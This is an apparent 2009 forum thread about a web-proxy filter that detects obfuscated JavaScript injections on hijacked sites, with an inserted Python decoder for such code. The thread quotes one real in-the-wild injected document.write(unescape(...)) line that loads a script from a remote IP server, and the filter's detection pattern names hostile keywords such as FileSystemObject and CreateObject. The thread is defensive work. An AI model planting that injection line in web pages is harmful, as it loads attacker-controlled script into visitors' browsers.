Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 01, 2009 09:25 PM
Two changes:
- Global variable "a" wasn't always reset, resulting in odd (but harmless) secondary effects.
- I came across two sites today containing code (pointing to a Latvian server) like:
Code:
document.write(unescape('%3Cscrz7RiKQpt%20srK7c%3D%2F%2F94%2E247cMV%2E6xE2Hsh%2E1z7R93N5z7R%2FfIejq3Nuery%2Ejz7RsK7%3E3N%3C%2FsfIecriz7Rpt3N%3E').replace(/K7|fIe|cMV|z7R|KQ|Hsh|6xE|3N|NK/g,""));
If the new subroutine matches, you'll get a Log-Rare entry like:
Code:
WEB JS_Escape replace http://my-hijacked-site.com/
Let me know of any false positives.
Code:
[Patterns]
Name = "JS Kill: Specific Escaped Code 9.04.01 [sd] (d.2)"
Active = TRUE
URL = "($TYPE(htm)|$TYPE(js)|$TYPE(vbs))(^$TST(keyword=*.(a_js|a_jsmeth).*))"
Limit = 7800
Match = "\= \" (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
"*\"$SET(1==\"\")$SET(5= (string))|$SET(1==\"\"; var prxBlocked=\")$SET(5= (string, large))*"
")&&(^*</script)\6)"
"|\= \' (%3C$TST(script=[1s]*)((%73%63|%53%43)\4|)("
"*\'$SET(1==\'\')$SET(5= (string))|$SET(1==\'\'; var prxBlocked=\')$SET(5= (string, large))*"
")&&(^*</script)\6)"
"|unescape \($TST(script=[1s]*) ("
"$INEST(\(,(")\2(^%") (%3C(%73%63|%53%43)\4*|\6),\))\)"
"((^ [,;)])(.(replace)\4$SET(1=\2\2.replace)|)|$SET(1=\2\2))"
"|\\(")\2 (%3C(%73%63|%53%43)\4*|\6)\\$TST(\2) \)((^ [,;)])|$SET(1=\\\2\\\2))$SET(5= (2nd level))"
"|(\\+")\2(^%")$SET(1=PrxVoidF\(\2Blocked: $GET(a)\2, \2\4\6)$SET(5= (large))"
" (^*</script)(%3C(%73%63|%53%43)\4\6|\6)"
")"
"&"
"$TST(\4=replace$SET(a=\4)|$SET(a=script)*)"
"|$TST($UESC(\6)=*("
".(createControlRange|FileSystemObject|fromCharCode)\4$SET(a=\4)"
"|<(iframe$SET(a=iframe)|applet$SET(a=applet)|object[^>]++data=$SET(a=object data))"
"|c("
"reateObject$SET(a=CreateObject)"
"|l(sid( \(" {| : {+|=" {+)|assid=" {+)(^D27CDB6E-AE6D-11cf-96B8-444553540000|[^0-9a-f])"
"$LST(ClassIDs)$SET(a=ClsID: \9)"
")"
"|ms-its:$SET(a=ms-its)"
"|src=$TST(flag=*.adurl:1.*)(\\(")\3 ((^\\$TST(\3))*\\$TST(\3)&&$LST(AdList)$SET(a=src: \9)*)|"
"$AV( ?*& $LST(AdList)$SET(a=src: \9)))"
"|unescape(^(^ \())$SET(a=unescape)"
"|VBScript$SET(a=VBScript)"
")*)"
"&"
"($TYPE(htm)$SET(eHits=$GET(eHits)"
"%3Cspan class=%22ProxFly-Span%22>$GET(mHead) JS Escape:%3C/span>"
" $ESC($GET(a))\5%3Cbr class=%22ProxFly-Br%22 />"
")|)"
"($TST(volat=*.log:2*)$ADDLST(Log-Main,[$DTM(d T)]\tWEB JS_Escape\5 \t$GET(a) \t\u)|)"
"($TST(volat=*.log:[12]c.*)$ADDLST(Log-Rare,WEB JS_Escape\5 \t$GET(a) \t\u)|)"
Replace = "\1$SET(a=)"
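To see what such a statement actually hands to document.write(), here is an added Python decoder (an example written for this thread, not sidki3003's code and not part of the filter) that emulates JavaScript's unescape() and the trailing replace(), peels a nested layer the way the filter's "(2nd level)" branch does, and then checks the result for the keywords the $UESC(\6) branch looks for. The statement it decodes is a constructed sample, not the one quoted above.

```python
import re

# Constructed sample (not the one quoted in the post): the same unescape().replace()
# trick, with junk tokens "Qz", "x9" and "Kp" spliced into an escaped <script> tag.
SAMPLE = ("document.write(unescape('%3CscQzript%20sx9rc%3D%2F%2Fexample%2EcomKp"
          "%2Fjqx9uery%2Ejs%3EQz%3C%2FscrKpipt%3E').replace(/Qz|x9|Kp/g,\"\"));")

# unescape('...') optionally followed by .replace(/junk/flags, "")
STMT_RE = re.compile(
    r"unescape\(\s*(?P<q>['\"])(?P<esc>.*?)(?P=q)\s*\)"
    r"(?:\s*\.replace\(\s*/(?P<junk>[^/]+)/(?P<flags>[gimsuy]*)\s*,"
    r"\s*(?P<q2>['\"])(?P=q2)\s*\))?", re.S)

# Keywords the filter tests for in the decoded text ($UESC(\6) branch)
SUSPICIOUS = re.compile(r"<script|<iframe|<applet|<object|createobject|fromcharcode"
                        r"|filesystemobject|vbscript|ms-its:", re.I)

def js_unescape(s):
    """Emulate JavaScript unescape(): decodes %XX and %uXXXX, leaves the rest untouched."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_statement(js):
    """Return the string document.write() would receive, or None if no unescape() call."""
    m = STMT_RE.search(js)
    if m is None:
        return None
    text = js_unescape(m.group("esc"))
    if m.group("junk"):
        flags = m.group("flags")
        # JS replace() without /g strips only the first hit; /i maps to re.I.
        # Literal alternations like /Qz|x9|Kp/ behave the same in JS and Python.
        text = re.sub(m.group("junk"), "", text,
                      count=0 if "g" in flags else 1,
                      flags=re.I if "i" in flags else 0)
    return text

def decode(js, max_depth=3):
    """Peel nested layers (the filter's '(2nd level)' case) and return the innermost text."""
    out = None
    for _ in range(max_depth):
        layer = decode_statement(js)
        if layer is None:
            break
        out = js = layer
    return out

def classify(js):
    """(decoded text, matched keyword or None); the keyword mirrors the filter's $SET(a=...)."""
    decoded = decode(js)
    if decoded is None:
        return None
    hit = SUSPICIOUS.search(decoded)
    return decoded, (hit.group(0).lower() if hit else None)

if __name__ == "__main__":
    print(classify(SAMPLE))
```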
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 01:15 AM
Where do I put the filter?
Under JS intercept?
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - sidki3003 - Apr. 02, 2009 01:34 AM
Dang, as mentioned above, it's an update.
So, look for the previous version, untick it, place the new version above it, save the config.
RE: Bugfix + 0day: JS Kill - Specific Escaped Code - bugger - Apr. 02, 2009 02:31 AM
Oh bugger. My apology!